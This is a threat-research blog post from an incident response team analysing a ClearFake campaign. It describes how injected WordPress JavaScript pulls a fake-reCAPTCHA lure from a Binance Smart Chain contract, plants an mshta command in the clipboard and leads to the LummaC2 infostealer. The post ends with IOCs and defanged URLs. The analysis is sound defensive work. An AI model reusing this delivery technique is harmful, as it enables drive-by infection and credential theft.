Investigating a ClearFake/ClickFix + Etherhide campaign

Image shows how infected website looks like to the victim

In this post we’d like to share some of the findings from researching a new ClearFake campaign.  

Summary 

A threat actor is infecting legitimate WordPress sites with a malicious JavaScript that results in a fake reCAPTCHA prompting the user into running a command. Running this command leads to an infostealer, LummaC2.  

The JavaScript on the infected site loads a malicious JavaScript stored in a Binance Smart Contract (BSC) from data-seed-prebsc-1-s1.bnbchain.org on TCP port 8545. The JavaScript from the Binance Smart Contract is responsible for generating the fake reCAPTCHA and contains a malicious command injected into the victim clipboard. The script only executes if the victim is browsing the infected website from a Windows operating system. 

Blocking the domain, data-seed-prebsc-1-s1.bnbchain.org, or restricting outbound traffic to non-standard HTTP/HTTPS ports will mitigate the threat.  

Introduction 

In mid-December, an incident was escalated to AteaIRT. EDR detected a possible information stealer execution.  During the investigation it was quickly confirmed that this was something we`ve read about before, FakeCaptcha/ClearFake. Although it seemed similar to previous ClearFake campaigns, there were some differences.  

The ClearFake and EtherHiding technique is not new. Cybersecurity researcher Randy McEoin wrote an excellent writeup on ClearFake Aug 6, 2023 (https://rmceoin.github.io/malware-analysis/2023/08/06/clearfake.html). Nati Tal and Oleg Zaytsev of Guardio Labs details EtherHiding in their write up from Oct 13, 2023 (https://labs.guard.io/etherhiding-hiding-web2-malicious-code-in-web3-smart-contracts-65ea78efad16). Both was inspiration to dig a little deeper and try to understand this infection-chain. 

ClearFake / EtherHiding 101 

ClearFake is a method using social engineering to trick the user into running malicious commands.  

Quoting Randy McEoin on the ClearFake naming: 
“I’m calling this one ClearFake until I see a previously used name for it. The name is a reference to the majority of the Javascript being used without obfuscation.” Source: https://rmceoin.github.io/malware-analysis/2023/08/06/clearfake.html 

EtherHiding is a technique used to host malicious code in a “smart contract” on the blockchain. Using this technique, the threat actor can centrally update all the infected websites by updating the content of the “smart contract”. Guardio writes: 

““EtherHiding” presents a novel twist on serving malicious code by utilizing Binance’s Smart Chain contracts to host parts of a malicious code chain in what is the next level of Bullet-Proof Hosting.” Source: https://labs.guard.io/etherhiding-hiding-web2-malicious-code-in-web3-smart-contracts-65ea78efad16 

Analysis 

An overview of the infection chain leading to LummaC2 infostealer is visualized below.

Image shows the infection chain leading to LummaC2 infostealer. 

During our investigation we did not dive into the LummaC2/infostealer part of the attack chain. Our research focused on the delivery and the loader stage leading up to LummaC2. 

During our investigation of this infection chain, we found some differences from the other write-ups on ClearFake and EtherHiding campaigns. The major difference is 

1. Smart contract loaded from the Binance Smart Chain test-network 
2. Query to a secondary smart contract that tracks if user has run the malicious command 

The BSC contract containing the malicious JavaScript was created 2024-Dec-08 10:13:07 PM UTC.  

Investigating the infection chain 

During our investigation of the EDR alert, we were unable to identify the website that lured the user into running the malicious “mshta.exe” command. But we were able to pivot on the data-seed-prebsc-1-s1.bnbchain.org domain to find additional samples to research.  

Image shows the base64 encoded script added to the website

The image shows the injected JavaScript on an infected page.  

At the time of writing, we can reliably identify over 800 websites involved in this campaign by searching for the <script> element. We have not investigated how these websites were compromised to begin with. A write-up from GoDaddy points out that this could be due to brute force and phishing campaigns aimed at acquiring legitimate passwords and usernames. Source: https://www.godaddy.com/resources/news/threat-actors-push-clickfix-fake-browser-updates-using-stolen-credentials  

The base64 encoded JavaScript decodes to 

Base64 decoded script injected into website 

The JavaScript fetches and executes a payload from the Binance Smart Chain (BSC) blockchain. The core functionality of the script involves fetching data via a JSON-RPC request to a BSC Test-net node and extracting a base64 encoded string from the response, decode it, and executing it as JavaScript. The script begins by checking the victim operating system using the navigator.userAgent property. The test is checking if the victim is running a Windows-based OS. If the test fails, the script terminates  without executing the main payload. 

The JavaScript fetched from the BSC smart contract contains html, CSS and JavaScript to build the UI and logic for the blurred overlay with the fake reCAPTCHA. It also contains the malicious command to run.

Image shows JavaScript functions in the script 

Image shows a secondary BSC contract being called 

Image shows the ‘commandToRun’ injected into victim clipboard 

The screenshots above are snippets of the code. IOCs and other artifacts found will be in the end of this post.

isGoalReached and phish completion check – indication of the campaign volume

The function isGoalReached() is an interesting one. The function repeats every second making calls to the BSC contract address and checking if it contains the value of the UUID generated. This is done to check if the victim has run the malicious command. If the UUID is found, the fake reCAPTCHA is removed and the website is displayed as normal.

We believe there is functionality on the threat actor infrastructure to update the BSC contract with the UUID of the victim when the malicious mshta.exe command is run. All contract interactions are logged and can be viewed with a blockchain explorer. (https://testnet.bscscan.com)

Image shows incoming transactions to BSC contract as of time of writing 

Checking the incoming transaction for this contract gives us an indication of the volume of this campaign. 

The execution of the malicious mshta command spawn a base64 encoded powershell script.  

Note: during our research, we observed that powershell command executed from the mshta process is  actively adjusted by the threat actor. 

The following screenshots are from the most recent identified loader stage. 

Image shows base64 encoded powershell 

Image shows the decoded powershell 

Early in the investigation the powershell executed via the mshta process was flagged as Emmenhtal by AnyRun (https://app.any.run/tasks/5378345d-ce3d-47ae-9936-e0657a380cba ) The Emmenthal classification was seen up until Jan-02-2025. Even though the loader has changed, the result is LummaC2 infection. 

Wrap-up 

This campaign was first seen early December and is continuing to spread. Using drive-by style attack this campaign delivers a malicious payload through the execution of malicious JavaScript, injected into legitimate compromised WordPress websites. 

We are currently tracking and updating a list of domains used for the malicious command here https://raw.githubusercontent.com/ttakvam/ThreatResearch/refs/heads/main/ClearFake-Dec-2024/IOCs/extracted_urls.txt 

Updated IOCs will be published here https://github.com/ttakvam/ThreatResearch/tree/main/ClearFake-Dec-2024  

IOCs 

Binance Smart Chain contracts/addresses 

• 0x80d31D935f0EC978253A26D48B5593599B9542C7 
• 0x7d0b5A06F8c43011fB66Eb90f61525A827eaE0d7 

Mshta URLs  

• hxxps[://]solve.fizq.net/awjxs.captcha 
• hxxps[://]solve.gevaq.com/awjxs.captcha 
• hxxps[://]inej.jenj.net/awjxs.captcha 
• hxxps[://]solve.jrqr.org/awjxs.captcha
• hxxps[://]check.qlkwr.com/awjsx.captcha
• hxxps[://]solve.bogx.org/awjsx.captcha